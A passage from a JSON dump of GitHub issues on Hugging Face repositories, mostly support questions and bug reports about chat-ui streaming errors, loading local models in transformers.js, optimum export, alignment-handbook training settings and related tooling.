way?\r\n\r\n[mean-nonorm-mac-01.json](https://github.com/xenova/transformers.js/files/13530082/mean-nonorm-mac-01.json)\r\n[mean-nonorm-pi-01.json](https://github.com/xenova/transformers.js/files/13530083/mean-nonorm-pi-01.json)\r\n[mean-norm-mac-01.json](https://github.com/xenova/transformers.js/files/13530084/mean-norm-mac-01.json)\r\n[mean-norm-pi-01.json](https://github.com/xenova/transformers.js/files/13530086/mean-norm-pi-01.json)\r\n", "url": "https://github.com/huggingface/transformers.js/issues/426", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-01T17:12:04Z", "updated_at": "2023-12-05T18:51:03Z", "user": "devfacet" }, { "repo": "huggingface/chat-ui", "number": 604, "title": "\"Invalid State: Controller is already closed\" error when trying to use chat-ui locally with llama.cpp", "body": "HELP NEEDED\r\n\r\n**What is the issue?**\r\nNot able to use chat-ui locally to get the response back when using the llama.cpp as a server.\r\nI can load the chat-ui after installing it via npm install and npm run dev. The env.local file is also configured and UI allows to send the request. However, the response never comes back in UI, and 'Sorry, something went wrong. Please try again' is shown.\r\nOn checking the logs in chat-ui, the error shown is:\r\n\r\nTypeError [ERR_INVALID_STATE]: Invalid state: Controller is already closed\r\n at new NodeError (node:internal/errors:399:5)\r\n at ReadableStreamDefaultController.enqueue (node:internal/webstreams/readablestream:1036:13)\r\n at update (/home/devuser/development/chat-ui-main/src/routes/conversation/[id]/+server.ts:158:20)\r\n at eval (/home/devuser/development/chat-ui-main/src/routes/conversation/[id]/+server.ts:168:13)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async Object.start (/home/devuser/development/chat-ui-main/src/routes/conversation/[id]/+server.ts:260:7) {\r\n code: 'ERR_INVALID_STATE'\r\n \r\n I also tested the llama.cpp server response via curl and the response came back correctly, so it's not an issue with llama.cpp.\r\n\r\nVersions:\r\nchat-ui code is latest from master.\r\nllama.cpp code is latest from master and build locally.\r\nTried with Node 20 and then with Node 19, but issue still remains.\r\n\r\nenv.local:\r\nMONGODB_URL=mongodb://localhost:27017\r\nMONGODB_DB_NAME=chat-ui\r\nMONGODB_DIRECT_CONNECTION=false\r\nUSE_LOCAL_WEBSEARCH=true\r\nHF_ACCESS_TOKEN=test\r\nMODELS=`[\r\n {\r\n \"name\": \"Zephyr\",\r\n \"chatPromptTemplate\": \"<|system|>\\n{{preprompt}}\\n{{#each messages}}{{#ifUser}}<|user|>\\n{{content}}\\n<|assistant|>\\n{{/ifUser}}{{#ifAssistant}}{{content}}\\n{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.7,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.1,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"url\": \"http://localhost:8080\",\r\n \"type\": \"llamacpp\"\r\n }\r\n ]\r\n }\r\n]`\r\n\r\nAm I missing anything in terms of installation steps? Any help here will be appreciated.\r\n\r\n\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/604", "state": "closed", "labels": [], "created_at": "2023-11-30T16:42:06Z", "updated_at": "2023-11-30T17:41:19Z", "comments": 1, "user": "ManasInd" }, { "repo": "huggingface/optimum", "number": 1556, "title": "RuntimeError: Cannot infer the task from a local directory yet, please specify the task manually.", "body": "### System Info\r\n\r\nwindows 10 - ryzen 3600x - 16 gb ddr4-3000 - python 3.10 - latest optimum inside a venv\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\nWhen I try to convert a model to openvino using \r\n\r\noptimum-cli export openvino -m \"d:\\sdxl\\LCMphoton\" \"d:\\sdxl\\LCMphotonov\"\r\n\r\nI have this error : \r\nRuntimeError: Cannot infer the task from a local directory yet, please specify the task manually.\r\n\r\nI am converting standard sd1.5 models to lcm with lora locally and want to convert that to openvino. I have local models which are not present on huggingface and it takes forever for me to upload there (only 1-2 megabytes max) Can we somehow use local models that have the same directory structure as hf ?\r\n```\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\noptimum-cli export openvino -m \"d:\\sdxl\\LCMphoton\" \"d:\\sdxl\\LCMphotonov\"\r\n\r\n### Expected behavior\r\n\r\nI want to be able to convert local models without having to download from huggingface.", "url": "https://github.com/huggingface/optimum/issues/1556", "state": "closed", "labels": [ "bug" ], "created_at": "2023-11-30T16:09:24Z", "updated_at": "2023-12-09T22:37:44Z", "comments": 2, "user": "patientx" }, { "repo": "huggingface/safetensors", "number": 396, "title": "[Feature request] How about support async save to disk?", "body": "### Feature request\n\nHow about support async save to disk? \r\n\r\n\n\n### Motivation\n\nthe weight or optimizer is vary large for LLMs\uff0cso\uff0cit will waste a lot of time for tensor from cpu to disk\u3002\r\nIf we can support async save to disk, it will be vary helpful.\n\n### Your contribution\n\n.", "url": "https://github.com/huggingface/safetensors/issues/396", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-30T02:55:25Z", "updated_at": "2024-02-13T01:46:40Z", "user": "ZHUI" }, { "repo": "huggingface/transformers.js", "number": 424, "title": "[Question] Batch inference for vit", "body": "It seems like all the tests in the repository related to processors and image models use one image per input. \r\n1. Do the models support feeding a batch of images as input during inference? Is there a speed benefit from this? \r\n2. Are there any other optimization/parallelization tools in transformers.js that I can use to process a set of images?\r\n\r\nUsed model: vit base (google/vit-base-patch16-224-in21k), tiny and small distillations (WinKawaks/vit-tiny-patch16-224), exported in onnx format with optimum\r\n", "url": "https://github.com/huggingface/transformers.js/issues/424", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-29T09:52:16Z", "updated_at": "2023-12-05T14:49:36Z", "user": "arseniymerkulov" }, { "repo": "huggingface/transformers", "number": 27755, "title": "How to inference the model with 200k length context", "body": "### Model description\n\nI want to test Yi-34B-200k, Although I ran through the model, as the context length increased, OOM appeared, and I wondered how I could test to 200k context length with sufficient GPU resources.\n\n### Open source status\n\n- [X] The model implementation is available\n- [X] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/27755", "state": "closed", "labels": [], "created_at": "2023-11-29T07:37:06Z", "updated_at": "2024-05-24T07:24:56Z", "user": "taishan1994" }, { "repo": "huggingface/transformers.js", "number": 423, "title": "Not able to load local classification onnx model", "body": "Was trying to follow the instruction of this page to load local custom model, but failed to find local path https://huggingface.co/docs/transformers.js/custom_usage\r\n\r\nthe code snippet\r\n`\r\nimport { env, AutoTokenizer, AutoModelForSequenceClassification } from '@xenova/transformers';\r\n\r\nenv.useFS = true;\r\nenv.localModelPath = '/path/to/local/file'\r\nenv.allowRemoteModels = false;\r\n\r\nlet tokenizer = await AutoTokenizer.from_pretrained('tinybert');\r\nlet model = await AutoModelForSequenceClassification.from_pretrained('tinybert');\r\n\r\nlet inputs = await tokenizer('I love transformers!');\r\nlet { logits } = await model(inputs);\r\n`\r\nhere is the file structure:\r\nmodels\r\n\u2514\u2500\u2500 tinybert\r\n \u251c\u2500\u2500 config.json\r\n \u251c\u2500\u2500 onnx\r\n \u2502 \u251c\u2500\u2500 model.onnx\r\n \u2502 \u2514\u2500\u2500 model_quantized.onnx\r\n \u251c\u2500\u2500 ort_config.json\r\n \u251c\u2500\u2500 special_tokens_map.json\r\n \u251c\u2500\u2500 tokenizer.json\r\n \u251c\u2500\u2500 tokenizer_config.json\r\n \u2514\u2500\u2500 vocab.txt\r\n\r\nerror:\r\n(node:36959) ExperimentalWarning: stream/web is an experimental feature. This feature could change at any time\r\n(Use `node --trace-warnings ...` to show where the warning was created)\r\nUnable to load from local path \"/Users/hzhang14/pete/2023_H1_spam/models/tinybert/tokenizer.json\": \"ReferenceError: Headers is not defined\"\r\nUnable to load from local path \"/Users/hzhang14/pete/2023_H1_spam/models/tinybert/tokenizer_config.json\": \"ReferenceError: Headers is not defined\"\r\nfile:///Users/hzhang14/pete/2023_H1_spam/node_modules/@xenova/transformers/src/utils/hub.js:462\r\n throw Error(`\\`local_files_only=true\\` or \\`env.allowRemoteModels=false\\` and file was not found locally at \"${localPath}\".`);\r\n ^\r\n\r\nError: `local_files_only=true` or `env.allowRemoteModels=false` and file was not found locally at \"/Users/hzhang14/pete/2023_H1_spam/models/tinybert/tokenizer.json\".\r\n at getModelFile (file:///Users/hzhang14/pete/2023_H1_spam/node_modules/@xenova/transformers/src/utils/hub.js:462:27)\r\n at async getModelJSON (file:///Users/hzhang14/pete/2023_H1_spam/node_modules/@xenova/transformers/src/utils/hub.js:575:18)\r\n at async Promise.all (index 0)\r\n at async loadTokenizer (file:///Users/hzhang14/pete/2023_H1_spam/node_modules/@xenova/transformers/src/tokenizers.js:52:16)\r\n at async Function.from_pretrained (file:///Users/hzhang14/pete/2023_H1_spam/node_modules/@xenova/transformers/src/tokenizers.js:3890:48)\r\n at async file:///Users/hzhang14/pete/2023_H1_spam/js/test.mjs:9:17", "url": "https://github.com/huggingface/transformers.js/issues/423", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-29T06:40:09Z", "updated_at": "2023-11-30T07:27:27Z", "user": "purezhanghan" }, { "repo": "huggingface/chat-ui", "number": 594, "title": "TypeError [ERR_INVALID_STATE]: Invalid state: Controller is already closed", "body": "i use the lasted main version and i have error when make chat, and in GUI , it show \"Sorry, something went wrong. Please try again.\"\r\n\r\nTypeError [ERR_INVALID_STATE]: Invalid state: Controller is already closed\r\n at new NodeError (node:internal/errors:405:5)\r\n at ReadableStreamDefaultController.enqueue (node:internal/webstreams/readablestream:1040:13)\r\n at update (file:////chat-ui-main/build/server/chunks/_server.ts-38ce6e8d.js:480:22)\r\n at file:////chat-ui-main/build/server/chunks/_server.ts-38ce6e8d.js:492:15\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async Object.start (file:////chat-ui-main/build/server/chunks/_server.ts-38ce6e8d.js:585:9) {\r\n code: 'ERR_INVALID_STATE'\r\n\r\ncan any one help me to fix this problem", "url": "https://github.com/huggingface/chat-ui/issues/594", "state": "closed", "labels": [ "support" ], "created_at": "2023-11-29T04:28:27Z", "updated_at": "2024-06-17T12:48:45Z", "comments": 18, "user": "AlexBlack2202" }, { "repo": "huggingface/chat-ui", "number": 593, "title": "Show image in chat box", "body": "Can I show a image by http link on chat box?", "url": "https://github.com/huggingface/chat-ui/issues/593", "state": "open", "labels": [ "support" ], "created_at": "2023-11-29T03:17:17Z", "updated_at": "2023-11-30T17:57:32Z", "comments": 3, "user": "ntqnhanguyen" }, { "repo": "huggingface/optimum", "number": 1554, "title": "ORT Models Failing because of the latest fsdp changes on transformers Trainer.", "body": "### System Info\n\n```shell\noptimum from source\r\ntransformers from source\n```\n\n\n### Who can help?\n\n@JingyaHuang \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nwhen trying to run training using ortmodule all models will fail due to latest changes on transformers trainer.\r\nfsdp was removed as an attribute and it included other changes.\r\n\r\nI can work on the fix if you guys don't have the bandwith.\r\n\r\n@JingyaHuang \r\nWe also been getting a lot of this types errors, can we work on some CI pipeline to spot these failures so we can fix them fast?\r\n\r\nThanks.\n\n### Expected behavior\n\n\r\n`AttributeError: 'ORTTrainer' object has no attribute 'fsdp'\r\n`\r\n", "url": "https://github.com/huggingface/optimum/issues/1554", "state": "closed", "labels": [ "bug" ], "created_at": "2023-11-28T20:22:40Z", "updated_at": "2023-12-26T18:15:02Z", "comments": 6, "user": "AdamLouly" }, { "repo": "huggingface/chat-ui", "number": 592, "title": "Authentication Doc and Code may be out-of-date/not working", "body": "## Description\r\n\r\nHello,\r\n\r\nFollowing the doc in the `README`: https://github.com/huggingface/chat-ui#basic-and-bearer. The UI should support (if setup in the `.env.local` file) `Basic` and `Bearer` authentication, however, what I noticed since the requests have been moved to the `huggingface` module is that the authorization flow has changed. \r\n\r\nIn the module:\r\n```js\r\n#huggingface/inference/dist/index.mjs\r\n[...]\r\n const { accessToken, model: _model, ...otherArgs } = args;\r\n let { model } = args;\r\n const { forceTask: task, includeCredentials, taskHint, ...otherOptions } = options ?? {};\r\n const headers = {};\r\n if (accessToken) {\r\n headers[\"Authorization\"] = `Bearer ${accessToken}`;\r\n }\r\n[...]\r\n```\r\n\r\nIf I define a custom chat endpoint in this way:\r\n```\r\n\"endpoints\": [{\"url\": \"URL/generate_stream\", \"type\" : \"tgi\", \"accessToken\": \"\"}]\r\n```\r\nthen the `accessToken` is properly propagated, but the suggested `\"authorization\": \"Bearer/Basic \"` does not work. \r\n\r\nIf this is intended:\r\n1. I would be happy to open a quick PR to change the README to something like:\r\n```suggestion\r\n#### Bearer\r\n\r\nCustom endpoints may require authorization, depending on how you configure them. Chat-UI support `Bearer` authentication. \r\n\r\nYou can use a token, which can be grabbed from [here](https://huggingface.co/settings/tokens).\r\n\r\nYou can then add the generated information and the `accessToken` parameter to your `.env.local`.\r\n\r\n```env\r\n\"endpoints\": [\r\n{\r\n\"url\": \"https://HOST:PORT\",\r\n\"accessToken\": \"\",\r\n}\r\n]\r\n\r\n**NOTE**: currently, `Basic` authentication is not supported\r\n\r\n```\r\nPlease let me know what do you think, and if I am missing something. \r\n\r\nThanks,\r\nGuido \r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/592", "state": "open", "labels": [ "bug", "documentation", "back" ], "created_at": "2023-11-28T18:50:15Z", "updated_at": "2023-11-29T13:29:22Z", "comments": 1, "user": "muscionig" }, { "repo": "huggingface/transformers.js", "number": 421, "title": "[Question] FeatureExtractionPipeline input length", "body": "@xenova : First of all thank you so much for your amazing work with this open source library. It opens up many possibilities.\r\n\r\nOne thing that caught my attention which is [FeatureExtractionPipeline](https://huggingface.co/docs/transformers.js/api/pipelines#module_pipelines.FeatureExtractionPipeline) can accept any amount of input regardless of the models' [sequence lengths](https://huggingface.co/spaces/mteb/leaderboard). Does it truncate or tokenize the data internally before applying it to the model? Is there documentation or an explanation about the implementation details?", "url": "https://github.com/huggingface/transformers.js/issues/421", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-28T17:28:28Z", "updated_at": "2023-12-02T11:20:52Z", "user": "devfacet" }, { "repo": "huggingface/sentence-transformers", "number": 2361, "title": "How to divide long texts into chunks using sentence-transformers?", "body": "Hello, I encounter the issue of my texts exceeding the maximum lengths allowed by pretrained models. So I intend to divide my texts into smaller chunks and then calculate the average embeddings over them.\r\n\r\nHowever, I find this process is not as straightforward as I initially thought. \r\n\r\nIn order to properly chunk the texts, I need to obtain the tokenized version of each text to determine the exact number of tokens. \r\n\r\nUnfortunately, it seems that the tokenizers in sentence-transformers are not standalone, meaning they can not tokenize long texts.\r\n\r\nSo what is the best way to solve this problem?\r\n\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2361", "state": "closed", "labels": [], "created_at": "2023-11-28T16:35:44Z", "updated_at": "2023-12-25T12:38:42Z", "user": "srhouyu" }, { "repo": "huggingface/alignment-handbook", "number": 56, "title": "Why does the alignment-handbook account for user & system Inputs in loss calculation", "body": "I noticed that the alignment-handbook doesn't ignore the loss calculated from both the user and system inputs Based on my knowledge, many SFT choose to ignore these. I'm curious about the reasoning behind this difference.", "url": "https://github.com/huggingface/alignment-handbook/issues/56", "state": "open", "labels": [], "created_at": "2023-11-28T06:03:53Z", "updated_at": "2024-05-30T07:45:29Z", "comments": 3, "user": "xffxff" }, { "repo": "huggingface/transformers", "number": 27737, "title": "How to save the generated output of BarkModel to an npz file?", "body": "Hello there!\r\n\r\nI'm using the BarkModel from Hugging Face Transformers and I'm wondering how to save the generated results to an npz file. I'd like to use these saved results as history prompts for the next generation.\r\n\r\nIn the [suno-ai/bark](https://github.com/suno-ai/bark) , when using the [`semantic_to_waveform`](https://github.com/suno-ai/bark/blob/main/bark/api.py#L35) method, I can pass `output_full = True`. This allows me to save the output to an npz file using `numpy.savez`.\r\n\r\nHowever, as I transition to using the BarkModel within the transformers framework, I am uncertain about the equivalent process. Could you kindly provide guidance on how to save the generated results of the BarkModel to an npz file in the Transformers library?\r\n\r\nAny assistance or code examples you could offer would be greatly appreciated.\r\n\r\nThank you for your time and support.", "url": "https://github.com/huggingface/transformers/issues/27737", "state": "closed", "labels": [], "created_at": "2023-11-28T03:55:19Z", "updated_at": "2024-01-10T08:03:57Z", "user": "chet-chen" }, { "repo": "huggingface/alignment-handbook", "number": 55, "title": "Running on single GPU(16GB)", "body": "Hi,\r\n\r\nWhat is the best way to run this on my high performance laptop?\r\nShould this somehow work? Can i calculate how many days/weeks it will run? \r\n\r\nThanks in advance\r\n\r\nSpecs:\r\n\r\n> OS: Win 11 (WSL2)\r\n> CPU: Intel Core i7 12850HX\r\n> Make: Lenovo Thinkpad P16 gen 1\r\n> Memory: 128GB DDR5-4800 (2400MHz) \r\n> GPU: Nvidia RTX A5500 16GB\r\n\r\nI found that this command would work on my laptop it seems:\r\n`ACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/multi_gpu.yaml --num_processes=1 scripts/run_sft.py recipes/zephyr-7b-beta/sft/config_lora.yaml --load_in_4bit=true --gradient_accumulation_steps=1024 --per_device_eval_batch_size=1 --per_device_train_batch_size=1`\r\n\r\nhow now run it for 1-2 hours ish:\r\n\r\n> ACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/multi_gpu.yaml --num_processes=1 scripts/run_sft.py recipes/zephyr-7b-beta/sft/config_lora.yaml --load_in_4bit=true --gradient_accumulation_steps=1024 --per_device_eval_batch_size=1 --per_device_train_batch_size=1\r\n> INFO:root:Using nproc_per_node=1.\r\n> 2023-11-27 15:41:33.914308: I tensorflow/core/util/port.cc:110] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.\r\n> 2023-11-27 15:41:33.941565: I tensorflow/core/platform/cpu_feature_guard.cc:182] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.\r\n> To enable the following instructions: AVX2 AVX_VNNI FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.\r\n> 2023-11-27 15:41:34.582753: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT\r\n> [2023-11-27 15:41:35,164] [INFO] [real_accelerator.py:158:get_accelerator] Setting ds_accelerator to cuda (auto detect)\r\n> /usr/local/lib/python3.11/dist-packages/trl/trainer/ppo_config.py:141: UserWarning: The `optimize_cuda_cache` arguement will be deprecated soon, please use `optimize_device_cache` instead.\r\n> warnings.warn(\r\n> 2023-11-27 15:41:35 - WARNING - __main__ - Process rank: 0, device: cuda:0, n_gpu: 1 distributed training: True, 16-bits training: False\r\n> 2023-11-27 15:41:35 - INFO - __main__ - Model parameters ModelArguments(base_model_revision=None, model_name_or_path='mistralai/Mistral-7B-v0.1', model_revision='main', model_code_revision=None, torch_dtype='auto', trust_remote_code=False, use_flash_attention_2=True, use_peft=True, lora_r=64, lora_alpha=16, lora_dropout=0.1, lora_target_modules=['q_proj', 'k_proj', 'v_proj', 'o_proj'], lora_modules_to_save=None, load_in_8bit=False, load_in_4bit=True, bnb_4bit_quant_type='nf4', use_bnb_nested_quant=False)\r\n> 2023-11-27 15:41:35 - INFO - __main__ - Data parameters DataArguments(chat_template=None, dataset_mixer={'HuggingFaceH4/ultrachat_200k': 1.0}, dataset_splits=['train_sft', 'test_sft'], max_train_samples=None, max_eval_samples=None, preprocessing_num_workers=12, truncation_side=None)\r\n> 2023-11-27 15:41:35 - INFO - __main__ - Training/evaluation parameters SFTConfig(\r\n> _n_gpu=1,\r\n> adafactor=False,\r\n> adam_beta1=0.9,\r\n> adam_beta2=0.999,\r\n> adam_epsilon=1e-08,\r\n> auto_find_batch_size=False,\r\n> bf16=True,\r\n> bf16_full_eval=False,\r\n> data_seed=None,\r\n> dataloader_drop_last=False,\r\n> dataloader_num_workers=0,\r\n> dataloader_pin_memory=True,\r\n> ddp_backend=None,\r\n> ddp_broadcast_buffers=None,\r\n> ddp_bucket_cap_mb=None,\r\n> ddp_find_unused_parameters=None,\r\n> ddp_timeout=1800,\r\n> debug=[],\r\n> deepspeed=None,\r\n> disable_tqdm=False,\r\n> dispatch_batches=None,\r\n> do_eval=True,\r\n> do_predict=False,\r\n> do_train=False,\r\n> eval_accumulation_steps=None,\r\n> eval_delay=0,\r\n> eval_steps=None,\r\n> evaluation_strategy=IntervalStrategy.EPOCH,\r\n> fp16=False,\r\n> fp16_backend=auto,\r\n> fp16_full_eval=False,\r\n> fp16_opt_level=O1,\r\n> fsdp=[],\r\n> fsdp_config={'min_num_params': 0, 'xla': False, 'xla_fsdp_grad_ckpt': False},\r\n> fsdp_min_num_params=0,\r\n> fsdp_transformer_layer_cls_to_wrap=None,\r\n> full_determinism=False,\r\n> gradient_accumulation_steps=1024,\r\n> gradient_checkpointing=True,\r\n> gradient_checkpointing_kwargs={'use_reentrant': False},\r\n> greater_is_better=None,\r\n> group_by_length=False,\r\n> half_precision_backend=auto,\r\n> hub_always_push=False,\r\n> hub_model_id=zephyr-7b-sft-lora,\r\n> hub_private_repo=False,\r\n> hub_strategy=HubStrategy.EVERY_SAVE,\r\n> hub_token=,\r\n> ignore_data_skip=False,\r\n> include_inputs_for_metrics=False,\r\n> include_tokens_per_second=False,\r\n> jit_mode_eval=False,\r\n> label_names=None,\r\n> label_smoothing_factor=0.0,\r\n> learning_rate=2e-05,\r\n> length_column_name=length,\r\n> load_best_model_at_end=False,\r\n> local_rank=0,\r\n> log_level=info,\r\n> log_level_replica=warning,\r\n> log_on_each_node=True,\r\n> logging_dir=data/zephyr-7b-sft-lora/runs/Nov27_15-41-35,\r\n> logging_first_step=True,\r\n> logging_nan_inf_filter=True,\r\n> logging_steps=5,\r\n> logg", "url": "https://github.com/huggingface/alignment-handbook/issues/55", "state": "open", "labels": [], "created_at": "2023-11-27T19:50:12Z", "updated_at": "2023-12-13T14:58:31Z", "comments": 1, "user": "patchie" }, { "repo": "huggingface/chat-ui", "number": 588, "title": "Hallucinations when using web search", "body": "I have tried to run a mistral model with the search api but the web results don't seem to be making it to the model.\r\n\r\nI'm hosting the model through text-gen-webui and encountering the exact same issue as #571. \r\n\r\nI've given it a go with [openhermes-2.5-mistral-7b.Q5_K_M.gguf](https://imgur.com/a/HQV1lGD), [it seems to use the search tool just fine](https://imgur.com/a/GN9ycZY) but fails to incorporate the results into its answer.\r\n\r\nAny idea how to fix this issue or at least how I could help with debugging.", "url": "https://github.com/huggingface/chat-ui/issues/588", "state": "open", "labels": [ "support", "websearch" ], "created_at": "2023-11-27T17:12:22Z", "updated_at": "2023-12-27T21:25:42Z", "comments": 2, "user": "NasonZ" }, { "repo": "huggingface/chat-ui", "number": 587, "title": "How do I format the ChatPromptTemplate ?", "body": "I currently have a working setup with llamacpp+mistral 7b instruct with the following loca.env :\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"Mistral\",\r\n \"chatPromptTemplate\": \"{{#each messages}}{{#ifUser}}[INST] {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}} {{content}} [/INST]{{/ifUser}}{{#ifAssistant}}{{content}} {{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 4096,\r\n \"max_new_tokens\": 4096,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [{\r\n \"url\": \"http://127.0.0.1:8080\",\r\n \"type\": \"llamacpp\"\r\n }\r\n/\r\n ]\r\n }\r\n]`\r\n``` \r\n\r\nI am trying to set up the model \"Neural Chat\" by intel , and the tamplate is:\r\n\r\n\r\n### System:\r\n{system_message}\r\n\r\n### User:\r\n{prompt}\r\n\r\n### Assistant:\r\n\r\nHow can I set the chatPromptTemplate to match it? and so it knows to summarize and search the web correctly?\r\nIm having some issues to understand how to format it, and where to put ### User ETC.\r\n\r\nThanks", "url": "https://github.com/huggingface/chat-ui/issues/587", "state": "open", "labels": [ "support", "models" ], "created_at": "2023-11-27T15:21:17Z", "updated_at": "2023-12-19T07:21:50Z", "comments": 5, "user": "iChristGit" }, { "repo": "huggingface/candle", "number": 1379, "title": "Help request: How to compile CUDA kernels with `cc-rs`?", "body": "Hello everybody,\r\n\r\nIn the process of adding PagedAttention to candle-vllm, I need to compile some CUDA kernels. I am currently trying to use `cc-rs` in a `build.rs` to automatically build the kernels. However, I am not making much progress as I have run into issues that seem to be tied to the build stage.\r\n\r\nI would really appreciate some pointers on how to use either `nvcc` or `cc-rs` to build these CUDA kernels. I have opened an issue with vllm: vllm-project/vllm#1793. \r\n\r\nThanks,\r\nEric", "url": "https://github.com/huggingface/candle/issues/1379", "state": "closed", "labels": [], "created_at": "2023-11-27T14:32:10Z", "updated_at": "2023-11-27T20:57:11Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers", "number": 27726, "title": "How to load PixArtAlphaPipeline in 8bit?", "body": "I know there is example but I couldn't make it work. I am trying to make an auto installer and gradio interface for Pix Art Alpha Pipeline so common people can install and use on their Windows PCs\r\n\r\nCurrently my below code working and I want to make it load in 8 bit is that possible?\r\n\r\n```\r\nif torch.cuda.is_available():\r\n pipe = PixArtAlphaPipeline.from_pretrained(\r\n \"PixArt-alpha/PixArt-XL-2-1024-MS\",\r\n torch_dtype=torch.float16,\r\n use_safetensors=True,\r\n )\r\n\r\n if ENABLE_CPU_OFFLOAD:\r\n pipe.enable_model_cpu_offload()\r\n else:\r\n pipe.to(device)\r\n print(\"Loaded on Device!\")\r\n\r\n # speed-up T5\r\n pipe.text_encoder.to_bettertransformer()\r\n\r\n if USE_TORCH_COMPILE:\r\n pipe.transformer = torch.compile(pipe.transformer, mode=\"reduce-overhead\", fullgraph=True)\r\n print(\"Model Compiled!\")\r\n```\r\n\r\n```\r\n seed = int(randomize_seed_fn(seed, randomize_seed))\r\n generator = torch.Generator().manual_seed(seed)\r\n\r\n if schedule == 'DPM-Solver':\r\n if not isinstance(pipe.scheduler, DPMSolverMultistepScheduler):\r\n pipe.scheduler = DPMSolverMultistepScheduler()\r\n num_inference_steps = dpms_inference_steps\r\n guidance_scale = dpms_guidance_scale\r\n elif schedule == \"SA-Solver\":\r\n if not isinstance(pipe.scheduler, SASolverScheduler):\r\n pipe.scheduler = SASolverScheduler.from_config(pipe.scheduler.config, algorithm_type='data_prediction', tau_func=lambda t: 1 if 200 <= t <= 800 else 0, predictor_order=2, corrector_order=2)\r\n num_inference_steps = sas_inference_steps\r\n guidance_scale = sas_guidance_scale\r\n else:\r\n raise ValueError(f\"Unknown schedule: {schedule}\")\r\n\r\n if not use_negative_prompt:\r\n negative_prompt = None # type: ignore\r\n prompt, negative_prompt = apply_style(style, prompt, negative_prompt)\r\n\r\n images = pipe(\r\n prompt=prompt,\r\n width=width,\r\n height=height,\r\n guidance_scale=guidance_scale,\r\n num_inference_steps=num_inference_steps,\r\n generator=generator,\r\n num_images_per_prompt=NUM_IMAGES_PER_PROMPT,\r\n use_resolution_binning=use_resolution_binning,\r\n output_type=\"pil\",\r\n ).images\r\n```\r\n\r\n### Who can help?\r\n\r\n@sayakpaul @Narsil @SunMarc @younesbelkada @gante \r\n\r\n\r\nI tried below but it broken the app\r\n\r\n```\r\ntext_encoder = T5EncoderModel.from_pretrained(\r\n \"PixArt-alpha/PixArt-XL-2-1024-MS\",\r\n subfolder=\"text_encoder\",\r\n load_in_8bit=True,\r\n device_map=\"auto\",\r\n\r\n)\r\npipe = PixArtAlphaPipeline.from_pretrained(\r\n \"PixArt-alpha/PixArt-XL-2-1024-MS\",\r\n text_encoder=text_encoder,\r\n transformer=None,\r\n device_map=\"auto\"\r\n)\r\n```\r\n\r\nThe error I am getting is like below\r\n\r\n```\r\nDownloading shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:00 If you scale up/down the number of GPUs, we recommend also scaling up the per-device batch size or number of gradient accumulation steps to keep the global batch size constant (and thus replicate our results).\r\n\r\nQ: What is the expected \"global batch size\"?\r\n\r\nFor example, I'm trying to run this on 2x3090s and need to know what the expected global batch size is so I can adjust the accumulation steps and per device train batch size.\r\n\r\nThanks much!", "url": "https://github.com/huggingface/alignment-handbook/issues/50", "state": "closed", "labels": [], "created_at": "2023-11-26T21:47:41Z", "updated_at": "2023-11-27T04:14:22Z", "user": "ohmeow" }, { "repo": "huggingface/transformers.js", "number": 417, "title": "[Question] Any examples of processing video frames of a user uploaded video (specifically for depth estimation)?", "body": "Hi there, I'm wondering if there are any examples of processing video frames of a user uploaded video? I'm specifically looking to run depth estimation on each frame of a short 